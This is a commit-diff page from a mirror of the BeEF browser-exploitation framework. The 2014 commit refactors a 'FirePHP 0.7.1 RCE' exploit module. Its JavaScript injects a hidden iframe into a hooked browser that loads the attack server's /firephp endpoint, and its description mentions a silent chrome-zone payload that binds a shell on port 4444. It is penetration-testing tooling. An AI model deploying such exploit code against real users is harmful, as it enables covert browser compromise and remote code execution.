Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Use beef.net for URI

Browse Source
This commit is contained in:
Brendan Coles
2014-05-10 09:50:38 +00:00
parent 195e2ab830
commit dbeedb1d92
3 changed files with 3 additions and 14 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
modules/exploits/firephp/command.js
View File

@@ -9,7 +9,7 @@ beef.execute(function() {
// detect firebug
if (window.console && (window.console.firebug || window.console.exception)) {
var firephp_<%= @command_id %> = beef.dom.createInvisibleIframe();
firephp_<%= @command_id %>.src = "<%= @beef_url %>/firephp";
firephp_<%= @command_id %>.src = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + "/firephp";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
} else {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "error=Module did not run. Firebug is not open in the hooked browser.");

2
modules/exploits/firephp/config.yaml
View File

@@ -12,7 +12,7 @@ beef:
enable: true
category: "Exploits"
name: "Firephp 0.7.1 RCE"
description: "Exploit FirePHP <= 0.7.1 to execute arbitrary JavaScript within the trusted 'chrome://' zone.<br/><br/>This module forces the browser to load '/firephp' on the public BeEF interface.<br/><br/>The payload is executed silently once the user moves the mouse over the array returned for 'http://[BeEF]/firephp' in Firebug.<br/><br/><b>Note:</b> Use msfpayload to generate JavaScript payloads. The default payload binds a shell on port 4444.<br/>See 'modules/exploits/firephp/payload.js'"
description: "Exploit FirePHP <= 0.7.1 to execute arbitrary JavaScript within the trusted 'chrome://' zone.<br/><br/>This module forces the browser to load '/firephp' on the BeEF server.<br/><br/>The payload is executed silently once the user moves the mouse over the array returned for 'http://[BeEF]/firephp' in Firebug.<br/><br/><b>Note:</b> Use msfpayload to generate JavaScript payloads. The default payload binds a shell on port 4444.<br/>See 'modules/exploits/firephp/payload.js'"
authors: ["Wireghoul", "bcoles"]
target:
user_notify: ["FF"]

13
modules/exploits/firephp/module.rb
View File

@@ -3,7 +3,7 @@
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
###
# Exploit: http://www.justanotherhacker.com/advisories/jahx132.html
# PoC by Wireghoul: http://www.justanotherhacker.com/advisories/jahx132.html
###
class Firephp_code_exec < BeEF::Core::Command
@@ -52,17 +52,6 @@ class Firephp_code_exec < BeEF::Core::Command
)
end
def self.options
configuration = BeEF::Core::Configuration.instance
proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = configuration.get("beef.http.public") || configuration.get("beef.http.host")
beef_port = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
url = "#{proto}://#{beef_host}:#{beef_port}"
return [
{ 'name' => 'beef_url', 'description' => 'BeEF interface URL', 'ui_label' => 'BeEF URL', 'value' => url, 'width' => '200px' }
]
end
def post_execute
save({'result' => @datastore['result']})
end